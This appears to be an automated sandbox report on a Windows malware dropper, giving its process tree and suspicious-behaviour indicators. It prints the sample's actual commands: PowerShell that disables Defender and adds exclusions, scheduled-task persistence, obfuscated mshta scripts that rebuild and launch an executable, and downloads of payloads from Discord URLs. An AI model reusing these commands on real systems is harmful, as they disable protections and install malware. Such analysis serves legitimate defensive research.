Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Explorer.EXE

pid process

1584 Explorer.EXE

pid	process
1584	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

setup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 808 wrote to memory of 2320	808	setup_installer.exe	setup_install.exe
PID 808 wrote to memory of 2320	808	setup_installer.exe	setup_install.exe
PID 808 wrote to memory of 2320	808	setup_installer.exe	setup_install.exe
PID 2320 wrote to memory of 2536	2320	setup_install.exe	cmd.exe
PID 2320 wrote to memory of 2536	2320	setup_install.exe	cmd.exe
PID 2320 wrote to memory of 2536	2320	setup_install.exe	cmd.exe
PID 2320 wrote to memory of 1304	2320	setup_install.exe	cmd.exe
PID 2320 wrote to memory of 1304	2320	setup_install.exe	cmd.exe
PID 2320 wrote to memory of 1304	2320	setup_install.exe	cmd.exe
PID 2536 wrote to memory of 1932	2536	cmd.exe	powershell.exe
PID 2536 wrote to memory of 1932	2536	cmd.exe	powershell.exe
PID 2536 wrote to memory of 1932	2536	cmd.exe	powershell.exe
PID 1304 wrote to memory of 1852	1304	cmd.exe	powershell.exe
PID 1304 wrote to memory of 1852	1304	cmd.exe	powershell.exe
PID 1304 wrote to memory of 1852	1304	cmd.exe	powershell.exe
PID 2320 wrote to memory of 1412	2320	setup_install.exe	cmd.exe
PID 2320 wrote to memory of 1412	2320	setup_install.exe	cmd.exe
PID 2320 wrote to memory of 1412	2320	setup_install.exe	cmd.exe
PID 2320 wrote to memory of 600	2320	setup_install.exe	cmd.exe
PID 2320 wrote to memory of 600	2320	setup_install.exe	cmd.exe
PID 2320 wrote to memory of 600	2320	setup_install.exe	cmd.exe
PID 2320 wrote to memory of 360	2320	setup_install.exe	cmd.exe
PID 2320 wrote to memory of 360	2320	setup_install.exe	cmd.exe
PID 2320 wrote to memory of 360	2320	setup_install.exe	cmd.exe
PID 2320 wrote to memory of 312	2320	setup_install.exe	cmd.exe
PID 2320 wrote to memory of 312	2320	setup_install.exe	cmd.exe
PID 2320 wrote to memory of 312	2320	setup_install.exe	cmd.exe
PID 2320 wrote to memory of 1724	2320	setup_install.exe	cmd.exe
PID 2320 wrote to memory of 1724	2320	setup_install.exe	cmd.exe
PID 2320 wrote to memory of 1724	2320	setup_install.exe	cmd.exe
PID 2320 wrote to memory of 3172	2320	setup_install.exe	cmd.exe
PID 2320 wrote to memory of 3172	2320	setup_install.exe	cmd.exe
PID 2320 wrote to memory of 3172	2320	setup_install.exe	cmd.exe
PID 2320 wrote to memory of 1644	2320	setup_install.exe	cmd.exe
PID 2320 wrote to memory of 1644	2320	setup_install.exe	cmd.exe
PID 2320 wrote to memory of 1644	2320	setup_install.exe	cmd.exe
PID 2320 wrote to memory of 920	2320	setup_install.exe	cmd.exe
PID 2320 wrote to memory of 920	2320	setup_install.exe	cmd.exe
PID 2320 wrote to memory of 920	2320	setup_install.exe	cmd.exe
PID 2320 wrote to memory of 1252	2320	setup_install.exe	cmd.exe
PID 2320 wrote to memory of 1252	2320	setup_install.exe	cmd.exe
PID 2320 wrote to memory of 1252	2320	setup_install.exe	cmd.exe
PID 1644 wrote to memory of 1148	1644	cmd.exe	Wed0901eb1dae126e32.exe
PID 1644 wrote to memory of 1148	1644	cmd.exe	Wed0901eb1dae126e32.exe
PID 1644 wrote to memory of 1148	1644	cmd.exe	Wed0901eb1dae126e32.exe
PID 1412 wrote to memory of 1276	1412	cmd.exe	Wed09f257bb7877d00b2.exe
PID 1412 wrote to memory of 1276	1412	cmd.exe	Wed09f257bb7877d00b2.exe
PID 360 wrote to memory of 4028	360	cmd.exe	Wed09d8d6edfaff2ac.exe
PID 360 wrote to memory of 4028	360	cmd.exe	Wed09d8d6edfaff2ac.exe
PID 360 wrote to memory of 4028	360	cmd.exe	Wed09d8d6edfaff2ac.exe
PID 2320 wrote to memory of 1344	2320	setup_install.exe	cmd.exe
PID 2320 wrote to memory of 1344	2320	setup_install.exe	cmd.exe
PID 2320 wrote to memory of 1344	2320	setup_install.exe	cmd.exe
PID 2320 wrote to memory of 2660	2320	setup_install.exe	cmd.exe
PID 2320 wrote to memory of 2660	2320	setup_install.exe	cmd.exe
PID 2320 wrote to memory of 2660	2320	setup_install.exe	cmd.exe
PID 1724 wrote to memory of 2308	1724	cmd.exe	Wed0971f17486f8.exe
PID 1724 wrote to memory of 2308	1724	cmd.exe	Wed0971f17486f8.exe
PID 1724 wrote to memory of 2308	1724	cmd.exe	Wed0971f17486f8.exe
PID 2320 wrote to memory of 1664	2320	setup_install.exe	cmd.exe
PID 2320 wrote to memory of 1664	2320	setup_install.exe	cmd.exe
PID 2320 wrote to memory of 1664	2320	setup_install.exe	cmd.exe
PID 2320 wrote to memory of 1948	2320	setup_install.exe	cmd.exe
PID 2320 wrote to memory of 1948	2320	setup_install.exe	cmd.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:1584

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:808

C:\Users\Admin\AppData\Local\Temp\7zS823188E5\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS823188E5\setup_install.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2320

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
4⤵
- Suspicious use of WriteProcessMemory
PID:2536

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1932

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
4⤵
- Suspicious use of WriteProcessMemory
PID:1304

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1852

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09f257bb7877d00b2.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:1412

C:\Users\Admin\AppData\Local\Temp\7zS823188E5\Wed09f257bb7877d00b2.exe
Wed09f257bb7877d00b2.exe
5⤵
- Executes dropped EXE
PID:1276

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09d8d6edfaff2ac.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:360

C:\Users\Admin\AppData\Local\Temp\7zS823188E5\Wed09d8d6edfaff2ac.exe
Wed09d8d6edfaff2ac.exe
5⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:4028

C:\Users\Admin\Pictures\Adobe Films\vIbhD0SVFqEXOPaAylTpMO12.exe
"C:\Users\Admin\Pictures\Adobe Films\vIbhD0SVFqEXOPaAylTpMO12.exe"
6⤵
- Executes dropped EXE
PID:776

C:\Users\Admin\Pictures\Adobe Films\HbnZcEkba_UqabLoS_3sKPqH.exe
"C:\Users\Admin\Pictures\Adobe Films\HbnZcEkba_UqabLoS_3sKPqH.exe"
6⤵
- Executes dropped EXE
PID:5736

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5736 -s 656
7⤵
- Program crash
PID:4412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5736 -s 672
7⤵
- Program crash
PID:5224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5736 -s 628
7⤵
- Program crash
PID:5256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5736 -s 668
7⤵
- Program crash
PID:5524

C:\Users\Admin\Pictures\Adobe Films\tcwuZ2T8hlTTHibIBDDSZ2lk.exe
"C:\Users\Admin\Pictures\Adobe Films\tcwuZ2T8hlTTHibIBDDSZ2lk.exe"
6⤵
PID:4964

C:\Users\Admin\Pictures\Adobe Films\UBmFHZ8mX1WA__gGTDlJaqG8.exe
"C:\Users\Admin\Pictures\Adobe Films\UBmFHZ8mX1WA__gGTDlJaqG8.exe"
6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5092

C:\Users\Admin\Pictures\Adobe Films\lFbCRQRRm6pas_s2WMj7t8O3.exe
"C:\Users\Admin\Pictures\Adobe Films\lFbCRQRRm6pas_s2WMj7t8O3.exe"
6⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:5656

C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe
"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"
7⤵
- Drops file in Program Files directory
PID:5364

C:\Program Files (x86)\Company\NewProduct\cutm3.exe
"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
7⤵
PID:2780

C:\Users\Admin\Pictures\Adobe Films\sGQhoH2XC61E44HNJvyPCldu.exe
"C:\Users\Admin\Pictures\Adobe Films\sGQhoH2XC61E44HNJvyPCldu.exe"
6⤵
- Executes dropped EXE
PID:5612

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im sGQhoH2XC61E44HNJvyPCldu.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\sGQhoH2XC61E44HNJvyPCldu.exe" & del C:\ProgramData\*.dll & exit
7⤵
PID:7596

C:\Windows\SysWOW64\taskkill.exe
taskkill /im sGQhoH2XC61E44HNJvyPCldu.exe /f
8⤵
- Kills process with taskkill
PID:7060

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
8⤵
- Delays execution with timeout.exe
PID:10148

C:\Users\Admin\Pictures\Adobe Films\BmtIrsZ3_c0yIULXQeeVdv2X.exe
"C:\Users\Admin\Pictures\Adobe Films\BmtIrsZ3_c0yIULXQeeVdv2X.exe"
6⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:5508

C:\Users\Admin\Documents\DR_qHmajFXmf2BFCwsz_9VoE.exe
"C:\Users\Admin\Documents\DR_qHmajFXmf2BFCwsz_9VoE.exe"
7⤵
PID:812

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
7⤵
- Creates scheduled task(s)
PID:4656

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
7⤵
- Creates scheduled task(s)
PID:2448

C:\Users\Admin\Pictures\Adobe Films\Ilfe8Jb1D8sjzZ1u9umT7mRG.exe
"C:\Users\Admin\Pictures\Adobe Films\Ilfe8Jb1D8sjzZ1u9umT7mRG.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5500

C:\Users\Admin\Pictures\Adobe Films\Ilfe8Jb1D8sjzZ1u9umT7mRG.exe
"C:\Users\Admin\Pictures\Adobe Films\Ilfe8Jb1D8sjzZ1u9umT7mRG.exe"
7⤵
PID:3716

C:\Users\Admin\Pictures\Adobe Films\39P_8p3e0thz0YWGHuCJsZ4x.exe
"C:\Users\Admin\Pictures\Adobe Films\39P_8p3e0thz0YWGHuCJsZ4x.exe"
6⤵
- Suspicious use of SetThreadContext
PID:2812

C:\Users\Admin\Pictures\Adobe Films\39P_8p3e0thz0YWGHuCJsZ4x.exe
"C:\Users\Admin\Pictures\Adobe Films\39P_8p3e0thz0YWGHuCJsZ4x.exe"
7⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:5952

C:\Users\Admin\Pictures\Adobe Films\4xggSC5Dk2sgR5wUwIkMzBkH.exe
"C:\Users\Admin\Pictures\Adobe Films\4xggSC5Dk2sgR5wUwIkMzBkH.exe"
6⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:5384

C:\Users\Admin\Pictures\Adobe Films\QwhzMv8YnKLriuCpQAAOHKFt.exe
"C:\Users\Admin\Pictures\Adobe Films\QwhzMv8YnKLriuCpQAAOHKFt.exe"
6⤵
PID:3620

C:\Users\Admin\Pictures\Adobe Films\qT9_LIOsJLOifDjajDL0jL3D.exe
"C:\Users\Admin\Pictures\Adobe Films\qT9_LIOsJLOifDjajDL0jL3D.exe"
6⤵
PID:6140

C:\Users\Admin\Pictures\Adobe Films\qT9_LIOsJLOifDjajDL0jL3D.exe
"C:\Users\Admin\Pictures\Adobe Films\qT9_LIOsJLOifDjajDL0jL3D.exe"
7⤵
PID:6556

C:\Users\Admin\Pictures\Adobe Films\pKdSBD4kg5OrCJpFtRrJ_5of.exe
"C:\Users\Admin\Pictures\Adobe Films\pKdSBD4kg5OrCJpFtRrJ_5of.exe"
6⤵
PID:1400

C:\Users\Admin\Pictures\Adobe Films\PU6N0UzgOFQoL73yAS3u09iD.exe
"C:\Users\Admin\Pictures\Adobe Films\PU6N0UzgOFQoL73yAS3u09iD.exe"
6⤵
- Adds Run key to start application
PID:5868

C:\Windows\SysWOW64\svchost.exe
svchost.exe
7⤵
PID:6680

C:\Windows\SysWOW64\cmd.exe
cmd /c cmd < Benvenuta.wmv
7⤵
PID:6952

C:\Windows\SysWOW64\cmd.exe
cmd
8⤵
PID:708

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^cumYgySQBgxPdjFKcKawUwBIsAmBYzAvcYxZIAEmtYNfVBRWjWqBCNmzERHNFdSiOXxsRGwVuTWVhjNPJDfwzYUHnqxRTQTNuGAXimtGVt$" Allora.wmv
9⤵
PID:6160

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com
Altrove.exe.com e
9⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2840

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e
10⤵
PID:6680

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e
11⤵
PID:7560

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e
12⤵
PID:7824

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e
13⤵
PID:7332

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e
14⤵
PID:7572

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e
15⤵
PID:7524

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e
16⤵
PID:2144

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e
17⤵
PID:7652

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e
18⤵
PID:8092

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e
19⤵
PID:8144

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e
20⤵
PID:2712

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e
21⤵
PID:7940

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e
22⤵
PID:4556

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e
23⤵
PID:9116

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e
24⤵
PID:9612

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e
25⤵
PID:10000

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e
26⤵
PID:1556

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e
27⤵
PID:7496

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e
28⤵
PID:4820

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e
29⤵
PID:8928

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e
30⤵
PID:4440

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e
31⤵
PID:3540

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e
32⤵
PID:8280

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e
33⤵
PID:7556

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e
34⤵
PID:9596

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e
35⤵
PID:10116

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e
36⤵
PID:6896

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e
37⤵
PID:6288

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e
38⤵
PID:9976

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e
39⤵
PID:4440

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e
40⤵
PID:8304

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e
41⤵
PID:5388

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e
42⤵
PID:8280

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
9⤵
- Runs ping.exe
PID:5064

C:\Users\Admin\Pictures\Adobe Films\sjsjsy3tJhZXPuKfUbFMNLJ3.exe
"C:\Users\Admin\Pictures\Adobe Films\sjsjsy3tJhZXPuKfUbFMNLJ3.exe"
6⤵
PID:4184

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E9C0.tmp\E9C1.tmp\E9C2.bat "C:\Users\Admin\Pictures\Adobe Films\sjsjsy3tJhZXPuKfUbFMNLJ3.exe""
7⤵
PID:6988

C:\Users\Admin\AppData\Local\Temp\E9C0.tmp\E9C1.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\E9C0.tmp\E9C1.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
8⤵
PID:1452

C:\Users\Admin\AppData\Local\Temp\E9C0.tmp\E9C1.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\E9C0.tmp\E9C1.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/902902974442000446/902903105925021696/18.exe" "18.exe" "" "" "" "" "" ""
8⤵
PID:584

C:\Users\Admin\AppData\Local\Temp\E9C0.tmp\E9C1.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\E9C0.tmp\E9C1.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/902902974442000446/902903166096531536/Transmissibility.exe" "Transmissibility.exe" "" "" "" "" "" ""
8⤵
PID:8156

C:\Users\Admin\AppData\Local\Temp\16991\18.exe
18.exe
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:1852

C:\Users\Admin\AppData\Local\Temp\16991\Transmissibility.exe
Transmissibility.exe
8⤵
PID:1304

C:\Users\Admin\AppData\Local\Temp\E9C0.tmp\E9C1.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\E9C0.tmp\E9C1.tmp\extd.exe "" "" "" "" "" "" "" "" ""
8⤵
PID:6888

C:\Users\Admin\Pictures\Adobe Films\YNXyHeWxDpD4uopZucOe1_lx.exe
"C:\Users\Admin\Pictures\Adobe Films\YNXyHeWxDpD4uopZucOe1_lx.exe"
6⤵
- Suspicious use of SetThreadContext
PID:5420

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
7⤵
PID:6616

C:\Users\Admin\Pictures\Adobe Films\macLieDTDoMGB8p38LfAtOJE.exe
"C:\Users\Admin\Pictures\Adobe Films\macLieDTDoMGB8p38LfAtOJE.exe"
6⤵
PID:5244

C:\Users\Admin\Pictures\Adobe Films\fX5J_05M9rY0FeWIgeM6VROa.exe
"C:\Users\Admin\Pictures\Adobe Films\fX5J_05M9rY0FeWIgeM6VROa.exe"
6⤵
PID:1452

C:\Users\Admin\Pictures\Adobe Films\uNCW5Yt4VF3kJmGgudvDF72l.exe
"C:\Users\Admin\Pictures\Adobe Films\uNCW5Yt4VF3kJmGgudvDF72l.exe"
6⤵
PID:5812

C:\Users\Admin\Pictures\Adobe Films\JXaAeHPcI87W62JfMfbsCBRN.exe
"C:\Users\Admin\Pictures\Adobe Films\JXaAeHPcI87W62JfMfbsCBRN.exe"
6⤵
PID:6932

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\JXaAeHPcI87W62JfMfbsCBRN.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\JXaAeHPcI87W62JfMfbsCBRN.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
7⤵
PID:4592

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\JXaAeHPcI87W62JfMfbsCBRN.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\JXaAeHPcI87W62JfMfbsCBRN.exe" ) do taskkill -im "%~NxK" -F
8⤵
PID:3616

C:\Users\Admin\AppData\Local\Temp\8pWB.eXE
8pWB.eXe /pO_wtib1KE0hzl7U9_CYP
9⤵
PID:4624

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
10⤵
PID:4408

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F
11⤵
PID:3172

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ("WSCRIPt.SheLl" ). rUn ("C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl + _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " ,0 , TruE ) )
10⤵
PID:6808

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl+ _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY
11⤵
PID:7828

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" EcHO "
12⤵
PID:4152

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"
12⤵
PID:7988

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe -y .\N3V4H8H.SXY
12⤵
PID:4384

C:\Windows\SysWOW64\taskkill.exe
taskkill -im "JXaAeHPcI87W62JfMfbsCBRN.exe" -F
9⤵
- Kills process with taskkill
PID:6448

C:\Users\Admin\Pictures\Adobe Films\NHDHrG4D0LgK6Dxjx4jwhsnI.exe
"C:\Users\Admin\Pictures\Adobe Films\NHDHrG4D0LgK6Dxjx4jwhsnI.exe"
6⤵
PID:6464

C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
7⤵
PID:1996

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"
8⤵
PID:10148

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1dc,0x1e0,0x1e4,0x1b4,0x1e8,0x7fff042fdec0,0x7fff042fded0,0x7fff042fdee0
9⤵
PID:4080

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff647209e70,0x7ff647209e80,0x7ff647209e90
